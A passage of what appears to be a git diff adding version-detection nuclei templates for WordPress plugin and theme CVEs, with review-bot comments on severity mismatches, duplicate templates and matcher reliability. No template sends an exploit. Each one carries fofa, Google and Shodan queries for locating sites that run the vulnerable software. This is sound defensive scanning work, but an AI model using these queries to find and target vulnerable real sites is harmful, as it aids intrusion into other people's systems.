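Review bot: The classification block (`CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H`, `cvss-score: 9.6`) and the description's closing sentence about code execution via the import/code-action feature contradict `severity: medium` and the `medium` tag; either the vector is wrong or the severity should be `critical`. A plain reflected XSS is normally scored 6.1 (`C:L/I:L/A:N`), so check which of the two the Wordfence record actually states and make the three fields agree rather than leaving a 9.6 finding hidden behind a medium filter. Note also that no request carries the `a-0-o-search_field_value` parameter; the template only reads the readme Stable tag.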
diff --git a/poc/cve/CVE-2024-43234-7b1393281a86cb7c58f05352db8b36aa.yaml b/poc/cve/CVE-2024-43234-7b1393281a86cb7c58f05352db8b36aa.yaml new file mode 100644 index 0000000000..a4dee6440c --- /dev/null +++ b/poc/cve/CVE-2024-43234-7b1393281a86cb7c58f05352db8b36aa.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43234-7b1393281a86cb7c58f05352db8b36aa + +info: + name: > + Woffice <= 5.4.14 - Unauthenticated Privilege Escalation + author: topscoder + severity: critical + description: > + The Woffice CRM theme for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 5.4.14. This makes it possible for unauthenticated attackers to gain access to administrator accounts. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4c64089a-929c-4a36-8aa8-61a5c9e8562b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-43234 + metadata: + fofa-query: "wp-content/themes/woffice/" + google-query: inurl:"/wp-content/themes/woffice/" + shodan-query: 'vuln:CVE-2024-43234' + tags: cve,wordpress,wp-theme,woffice,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/woffice/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woffice" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.4.14') \ No newline at end of file diff --git a/poc/cve/CVE-2024-51815-c1a5d2a9a6da5fe3f3b34cd3252bd9c2.yaml b/poc/cve/CVE-2024-51815-c1a5d2a9a6da5fe3f3b34cd3252bd9c2.yaml new file mode 100644 index 0000000000..a4bbf0373d --- /dev/null 
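Review bot: The word matcher `"woffice"` is evaluated against the body of `style.css`, and nuclei word matchers are case-sensitive unless `case-insensitive: true` is set; a theme header normally reads `Theme Name: Woffice`, so unless the lowercase slug also appears somewhere in that file (a `Text Domain:` or URI line, say) the `and` condition fails and the template never fires for anyone. I could not confirm the file's contents from the hunk, so either verify against a real Woffice `style.css` or add `case-insensitive: true` to that matcher. Since this is an unauthenticated account takeover, the description should also state that the check is version-based and does not attempt the takeover, so that a hit is triaged as "update the theme" rather than "confirmed compromise path".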
+++ b/poc/cve/CVE-2024-51815-c1a5d2a9a6da5fe3f3b34cd3252bd9c2.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-51815-c1a5d2a9a6da5fe3f3b34cd3252bd9c2 + +info: + name: > + s2Member (Pro) <= 241114 - Unauthenticated Remote Code Execution + author: topscoder + severity: critical + description: > + The s2Member – Excellent for All Kinds of Memberships, Content Restriction Paywalls & Member Access Subscriptions (Pro) plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 241114. This makes it possible for unauthenticated attackers to execute code on the server. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ffc6de82-a4c1-4125-9be0-4fb6de42c178?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2024-51815 + metadata: + fofa-query: "wp-content/plugins/s2member/" + google-query: inurl:"/wp-content/plugins/s2member/" + shodan-query: 'vuln:CVE-2024-51815' + tags: cve,wordpress,wp-plugin,s2member,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/s2member/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "s2member" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 241114') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54240-a2f6789a7a236589446d14d1c3f866b6.yaml b/poc/cve/CVE-2024-54240-a2f6789a7a236589446d14d1c3f866b6.yaml new file mode 100644 index 0000000000..22b4cab3b4 --- /dev/null +++ b/poc/cve/CVE-2024-54240-a2f6789a7a236589446d14d1c3f866b6.yaml 
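Review bot: `severity: critical` and the `critical` tag do not agree with the template's own `cvss-score: 8.1` (the vector carries `AC:H`), which is the high band; pick one and keep the fields consistent. The request also fingerprints the free `s2member` plugin directory while the `name` targets `s2Member (Pro)`; if the Pro build ships as a separate add-on directory, this readme may advertise the free plugin's version and either miss or misreport Pro installs — worth confirming against the Wordfence record before relying on the match. The date-style version `241114` compares correctly as a plain integer with `compare_versions`, which is fine.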
@@ -0,0 +1,59 @@ +id: CVE-2024-54240-a2f6789a7a236589446d14d1c3f866b6 + +info: + name: > + Blaze Online eParcel for WooCommerce <= 1.3.3 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Blaze Online eParcel for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 1.3.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/eeca3208-2cab-4c03-935f-8f657d7ca87f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-54240 + metadata: + fofa-query: "wp-content/plugins/blaze-online-eparcel-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/blaze-online-eparcel-for-woocommerce/" + shodan-query: 'vuln:CVE-2024-54240' + tags: cve,wordpress,wp-plugin,blaze-online-eparcel-for-woocommerce,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/blaze-online-eparcel-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "blaze-online-eparcel-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.3') \ No newline at end of file 
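Review bot: The `and`-ed word matcher requires the literal slug `blaze-online-eparcel-for-woocommerce` to occur in the body of `readme.txt`; a WordPress readme carries the display name in its `=== ... ===` title, not necessarily the hyphenated directory name, and if the slug is absent the template silently never matches. I could not verify the readme's contents from the hunk; either confirm the slug appears or match on the title line instead (`(?i)Blaze Online eParcel for WooCommerce` as a regex matcher), since the fixed request path already scopes the response to this plugin. The same assumption is baked into every readme-based template in this commit.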
diff --git a/poc/cve/CVE-2024-54240-ed4ff64a46e17d58cd08c47d78193084.yaml b/poc/cve/CVE-2024-54240-ed4ff64a46e17d58cd08c47d78193084.yaml new file mode 100644 index 0000000000..da7b407476 --- /dev/null +++ b/poc/cve/CVE-2024-54240-ed4ff64a46e17d58cd08c47d78193084.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-54240-ed4ff64a46e17d58cd08c47d78193084 + +info: + name: > + Blaze Online eParcel for WooCommerce <= 1.3.3 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Blaze Online eParcel for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 1.3.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/da58f0d5-1608-4c45-89a5-bc5bd358263e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-54240 + metadata: + fofa-query: "wp-content/plugins/blaze-online-eparcel-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/blaze-online-eparcel-for-woocommerce/" + shodan-query: 'vuln:CVE-2024-54240' + tags: cve,wordpress,wp-plugin,blaze-online-eparcel-for-woocommerce,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/blaze-online-eparcel-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "blaze-online-eparcel-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.3') \ No newline at end of file 
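Review bot: This is the second template for CVE-2024-54240 added in the same commit, with identical request, extractors, matchers and version bound, differing only in the Wordfence reference UUID (`da58f0d5-...` versus `eeca3208-...`); both fire on the same host and report the one finding twice. Keep a single file and list both Wordfence URLs under `reference`, or, if the two records really describe different parameters, put that in the `name` so the duplication is explainable to whoever reads the scan output.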
diff --git a/poc/cve/CVE-2024-54242-3b5086237f4638cb162a9f792453261e.yaml b/poc/cve/CVE-2024-54242-3b5086237f4638cb162a9f792453261e.yaml new file mode 100644 index 0000000000..a9387ba47c --- /dev/null +++ b/poc/cve/CVE-2024-54242-3b5086237f4638cb162a9f792453261e.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54242-3b5086237f4638cb162a9f792453261e + +info: + name: > + Simple Notification <= 1.3 - Missing Authorization + author: topscoder + severity: low + description: > + The Simple Notification plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8d6637f7-7035-4355-9c9d-193ea87c6e62?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L + cvss-score: 5.4 + cve-id: CVE-2024-54242 + metadata: + fofa-query: "wp-content/plugins/simple-notification/" + google-query: inurl:"/wp-content/plugins/simple-notification/" + shodan-query: 'vuln:CVE-2024-54242' + tags: cve,wordpress,wp-plugin,simple-notification,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/simple-notification/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "simple-notification" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3') \ No newline at end of file 
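Review bot: `severity: low` and the `low` tag do not match `cvss-score: 5.4` (`I:L/A:L`), which is medium under the CVSS bands nuclei follows; set `severity: medium` and change the tag. The description, "missing capability check on a function", names neither the hook nor the effect, so a hit gives an operator nothing concrete to verify or hunt for in logs; if the Wordfence record identifies the action, quote it in the description.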
diff --git a/poc/cve/CVE-2024-54242-96632825cfd9f5b03b99528997824213.yaml b/poc/cve/CVE-2024-54242-96632825cfd9f5b03b99528997824213.yaml new file mode 100644 index 0000000000..285f6696d7 --- /dev/null +++ b/poc/cve/CVE-2024-54242-96632825cfd9f5b03b99528997824213.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54242-96632825cfd9f5b03b99528997824213 + +info: + name: > + Simple Notification <= 1.3 - Missing Authorization + author: topscoder + severity: low + description: > + The Simple Notification plugin for WordPress is vulnerable to unauthorized access to functionality in versions up to, and including, 1.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to make use of this functionality intended for higher-privileged users. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/191521ba-817e-4a7f-99df-3fe9cc1c5de3?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L + cvss-score: 5.4 + cve-id: CVE-2024-54242 + metadata: + fofa-query: "wp-content/plugins/simple-notification/" + google-query: inurl:"/wp-content/plugins/simple-notification/" + shodan-query: 'vuln:CVE-2024-54242' + tags: cve,wordpress,wp-plugin,simple-notification,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/simple-notification/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "simple-notification" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3') \ No newline at end of file 
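Review bot: Second template for CVE-2024-54242 in this commit — same path, extractors, matchers and `<= 1.3` bound, differing only in the Wordfence UUID and a reworded description — so a vulnerable host is reported twice. Consolidate into one file carrying both references. It also inherits the same mismatch as its twin: `severity: low` against a `cvss-score: 5.4` that is medium.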
diff --git a/poc/cve/CVE-2024-54243-87a7d63f5b8e33b647cfcc9ecc055c10.yaml b/poc/cve/CVE-2024-54243-87a7d63f5b8e33b647cfcc9ecc055c10.yaml new file mode 100644 index 0000000000..fa2f46c1e1 --- /dev/null +++ b/poc/cve/CVE-2024-54243-87a7d63f5b8e33b647cfcc9ecc055c10.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54243-87a7d63f5b8e33b647cfcc9ecc055c10 + +info: + name: > + Echoza <= 0.1.1 - Authenticated (Subscriber+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Echoza plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 0.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3823fedd-f5b9-420d-98b5-8b7bfc6b02de?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-54243 + metadata: + fofa-query: "wp-content/plugins/echoza/" + google-query: inurl:"/wp-content/plugins/echoza/" + shodan-query: 'vuln:CVE-2024-54243' + tags: cve,wordpress,wp-plugin,echoza,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/echoza/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "echoza" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.1.1') \ No newline at end of file 
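Review bot: `severity: low` and the `low` tag contradict `cvss-score: 6.4` with `S:C` (stored XSS reachable by any Subscriber), which is medium; set `severity: medium` and replace the tag. The check is version-only — no payload is stored or rendered — so the finding should be worded as "vulnerable version detected" in the description rather than implying the injection was demonstrated.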
diff --git a/poc/cve/CVE-2024-54244-908fba9dd40f4471beff68bece44dab3.yaml b/poc/cve/CVE-2024-54244-908fba9dd40f4471beff68bece44dab3.yaml new file mode 100644 index 0000000000..575e4a7673 --- /dev/null +++ b/poc/cve/CVE-2024-54244-908fba9dd40f4471beff68bece44dab3.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54244-908fba9dd40f4471beff68bece44dab3 + +info: + name: > + Easy Replace <= 1.3 - Authenticated (Subscriber+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Easy Replace plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8536e655-72cc-4d7a-8ca0-7ba3042e03c1?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-54244 + metadata: + fofa-query: "wp-content/plugins/easy-replace/" + google-query: inurl:"/wp-content/plugins/easy-replace/" + shodan-query: 'vuln:CVE-2024-54244' + tags: cve,wordpress,wp-plugin,easy-replace,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/easy-replace/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "easy-replace" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3') \ No newline at end of file 
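Review bot: Same inconsistency as the other stored-XSS templates in this commit: `severity: low` and tag `low` against `cvss-score: 6.4`, which is medium. A further caveat worth a comment: if this plugin's readme declares `Stable tag: trunk`, as older plugins sometimes do, the `[0-9.]+` capture yields nothing, `compare_versions` receives an empty string and the template silently produces no result instead of flagging an unknown version — I cannot tell from the hunk whether that applies here, so either confirm the readme or add a fallback on the main plugin file's `Version:` header.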
diff --git a/poc/cve/CVE-2024-54245-25b820cd545669d7785ad46d5c7b657d.yaml b/poc/cve/CVE-2024-54245-25b820cd545669d7785ad46d5c7b657d.yaml new file mode 100644 index 0000000000..5f769cdc12 --- /dev/null +++ b/poc/cve/CVE-2024-54245-25b820cd545669d7785ad46d5c7b657d.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54245-25b820cd545669d7785ad46d5c7b657d + +info: + name: > + Clients <= 1.1.4 - Authenticated (Subscriber+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Clients plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.1.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/49589caf-232b-4067-a607-2902e932553e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-54245 + metadata: + fofa-query: "wp-content/plugins/clients/" + google-query: inurl:"/wp-content/plugins/clients/" + shodan-query: 'vuln:CVE-2024-54245' + tags: cve,wordpress,wp-plugin,clients,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/clients/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "clients" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.4') \ No newline at end of file 
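Review bot: `severity: low` against `cvss-score: 6.4` is the medium band; align the two and the tag. The word matcher `"clients"` is an ordinary English word rather than anything plugin-specific, so on hosts that answer 200 with a generic page for any path it adds almost no discrimination; the `Stable tag:` regex is what actually gates the match, which deserves a comment, or match on the readme's `=== ... ===` title instead.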
diff --git a/poc/cve/CVE-2024-54261-5582920a3f8c43604a8f19f2f919fe5e.yaml b/poc/cve/CVE-2024-54261-5582920a3f8c43604a8f19f2f919fe5e.yaml new file mode 100644 index 0000000000..e864a4af39 --- /dev/null +++ b/poc/cve/CVE-2024-54261-5582920a3f8c43604a8f19f2f919fe5e.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-54261-5582920a3f8c43604a8f19f2f919fe5e + +info: + name: > + TAX SERVICE Electronic HDM <= 1.1.2 - Unauthenticated SQL Injection + author: topscoder + severity: critical + description: > + The TAX SERVICE Electronic HDM plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.1.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/970c7495-e43c-4606-8154-e2ac7d1c4816?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-54261 + metadata: + fofa-query: "wp-content/plugins/virtual-hdm-for-taxservice-am/" + google-query: inurl:"/wp-content/plugins/virtual-hdm-for-taxservice-am/" + shodan-query: 'vuln:CVE-2024-54261' + tags: cve,wordpress,wp-plugin,virtual-hdm-for-taxservice-am,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/virtual-hdm-for-taxservice-am/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "virtual-hdm-for-taxservice-am" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.2') \ No newline at end of file 
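Review bot: `severity: critical` and the `critical` tag overstate the template's own `cvss-score: 7.5` (`C:H/I:N/A:N`), which is the high band; an unauthenticated SQLi is still serious, but the fields should agree — `severity: high`. The description refers to "the user supplied parameter" without naming it; if the Wordfence record identifies it, include it so a responder knows what to look for in access logs, because the template itself never sends an injection and only reads the readme Stable tag.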
diff --git a/poc/cve/CVE-2024-54262-900f1530db5979118c2aeaebba1c30e9.yaml b/poc/cve/CVE-2024-54262-900f1530db5979118c2aeaebba1c30e9.yaml new file mode 100644 index 0000000000..ea05746fcc --- /dev/null +++ b/poc/cve/CVE-2024-54262-900f1530db5979118c2aeaebba1c30e9.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-54262-900f1530db5979118c2aeaebba1c30e9 + +info: + name: > + Import Export For WooCommerce <= 1.5 - Authenticated (Subscriber+) Arbitrary File Upload + author: topscoder + severity: low + description: > + The Import Export For WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 1.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/afb5b791-0bc7-466f-87f6-f6c5ebed576b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.9 + cve-id: CVE-2024-54262 + metadata: + fofa-query: "wp-content/plugins/import-export-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/import-export-for-woocommerce/" + shodan-query: 'vuln:CVE-2024-54262' + tags: cve,wordpress,wp-plugin,import-export-for-woocommerce,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/import-export-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "import-export-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54267-ccf671ed5cd0d4e6c19828ed0428edad.yaml b/poc/cve/CVE-2024-54267-ccf671ed5cd0d4e6c19828ed0428edad.yaml new file mode 100644 index 0000000000..c2c020947c --- /dev/null 
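Review bot: `severity: low` and the `low` tag are wrong for this template: its own vector `AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H` scores 9.9 and the description is Subscriber-level arbitrary file upload leading to remote code execution, so anyone running with `-severity critical,high` will never see the hit. Set `severity: critical` and `tags: cve,wordpress,wp-plugin,import-export-for-woocommerce,critical`. The check itself is readme-version inference only; no upload is attempted, which the description should state.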
+++ b/poc/cve/CVE-2024-54267-ccf671ed5cd0d4e6c19828ed0428edad.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54267-ccf671ed5cd0d4e6c19828ed0428edad + +info: + name: > + CM Answers <= 3.2.6 - Missing Authorization + author: topscoder + severity: low + description: > + The CM Answers – Powerful WordPress Forum Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 3.2.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/91a20180-871b-4208-b11e-d3ff2a7e8d23?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-54267 + metadata: + fofa-query: "wp-content/plugins/cm-answers/" + google-query: inurl:"/wp-content/plugins/cm-answers/" + shodan-query: 'vuln:CVE-2024-54267' + tags: cve,wordpress,wp-plugin,cm-answers,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cm-answers/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cm-answers" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.2.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54268-1ee53f44eb931385f5bebe5e1a66b55d.yaml b/poc/cve/CVE-2024-54268-1ee53f44eb931385f5bebe5e1a66b55d.yaml new file mode 100644 index 0000000000..01f97aa5e0 --- /dev/null +++ b/poc/cve/CVE-2024-54268-1ee53f44eb931385f5bebe5e1a66b55d.yaml 
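Review bot: `severity: low` and the `low` tag disagree with `cvss-score: 4.3`, which is medium under the CVSS bands nuclei's severity levels follow; set `severity: medium`. "Missing capability check on a function" gives an operator no hook name to verify or to search for in request logs — if the Wordfence record names the action, quote it in the description.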
@@ -0,0 +1,59 @@ +id: CVE-2024-54268-1ee53f44eb931385f5bebe5e1a66b55d + +info: + name: > + SiteOrigin Widgets Bundle <= 1.64.0 - Missing Authorization + author: topscoder + severity: low + description: > + The SiteOrigin Widgets Bundle plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.64.0. This makes it possible for authenticated attackers, with Contributor-level access and above, to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6864382e-7a45-413c-a80e-a5dd827fe6c7?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-54268 + metadata: + fofa-query: "wp-content/plugins/so-widgets-bundle/" + google-query: inurl:"/wp-content/plugins/so-widgets-bundle/" + shodan-query: 'vuln:CVE-2024-54268' + tags: cve,wordpress,wp-plugin,so-widgets-bundle,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/so-widgets-bundle/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "so-widgets-bundle" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.64.0') \ No newline at end of file diff --git a/poc/cve/cve-2021-26084.yaml b/poc/cve/cve-2021-26084.yaml new file mode 100644 index 0000000000..223055583e --- /dev/null +++ b/poc/cve/cve-2021-26084.yaml 
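Review bot: `severity: low` and the `low` tag do not match `cvss-score: 4.3` (medium band); set `severity: medium` and the corresponding tag. The description again says only "missing capability check on a function" — naming the affected action would make the finding actionable. The version check is readme inference only and never exercises the function.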
